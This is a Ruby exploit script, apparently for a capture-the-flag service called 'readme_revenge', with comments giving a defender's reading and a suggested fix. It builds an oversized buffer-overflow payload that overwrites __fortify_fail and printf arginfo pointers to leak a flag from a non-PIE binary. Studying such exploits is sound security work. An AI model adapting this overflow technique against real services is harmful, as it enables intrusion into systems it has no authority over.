# encoding: ASCII-8BIT
# Proof-of-concept input for the `readme_revenge` service (CTF-style target).
# Harness the author ran it against:
#   socat TCP-LISTEN:2323,reuseaddr,fork EXEC:./readme_revenge
#   ruby pwn.rb
#
# Defender's reading: the script sends one oversized message whose layout
# places chosen 64-bit little-endian values (p64) at fixed offsets. The
# hard-coded addresses (0x4359d0, 0x6b4040, 0x6b73e0, 0x6b7430) only make
# sense for a build with fixed, non-relocated addresses — presumably a
# non-PIE binary; confirm against the target. A 1000-byte filler followed by
# a value the author labels "address to jump to" is consistent with an
# unchecked copy of network input into a fixed-size buffer (TODO confirm in
# the binary); the service-side fix is a length check on the receive path,
# and PIE/ASLR plus stack protection are the hardening that makes
# fixed-offset inputs like this one fail.

require 'pwn'

# pwntools-style settings: 64-bit target, verbose logging of the exchange.
context.arch = 'amd64'
context.log_level = :debug

# Plain TCP client to the socat-wrapped service.
z = Sock.new 'localhost', 2323

# shellcode = p8(0x90) * 8

payload = ""
# 1000 filler bytes precede the first controlled pointer; the commented-out
# `cyclic 112` lines below suggest the offsets were located with a cyclic
# pattern during analysis.
payload += 'A' * 1000
# payload += cyclic 112
# payload += shellcode
# payload += 'A' * (1000 - 112 - shellcode.length)
# Value written at offset 1000; the author identifies it as __fortify_fail.
payload += p64 0x4359d0 # address to jump to, __fortify_fail

# 1000 + 8 + 432 + 8 mirrors the payload layout below: it is the offset of
# the `p64 0x6b4040` qword, so flag_addr presumably points at that qword if
# the received data starts at 0x6b73e0 — TODO confirm.
flag_addr = 0x6b73e0 + 1000 + 8 + 432 + 8

# Only needed to trigger redirection, most of this
# could be anywhere in the buffer we send
payload += 'B' * 432
payload += p64 flag_addr # pointer to char*
payload += p64 0x6b4040 # flag
# 608 bytes in total after the first pointer; 16 = the two p64 values above.
payload += 'C' * (608 - 432 - 16)
payload += p64(0) # offset 1000 + 8 + 608 must be 0, else segfault
payload += 'D' * 112
# Last qword in the message; the author labels it as printf's arginfo table.
payload += p64 0x6b7430 # printf arginfo table
#payload += cyclic 1000

# Single send; the script does not read the response or close the socket,
# so any output is only visible through the :debug log level set above.
z.send payload

# This works but the program crashes after printing the flag ¯\_(ツ)_/¯

# z.send(cyclic(1000) + p64(0x6b7450) + 'A' * 608 + p64(0) + cyclic(112) + p64(0x6b7430))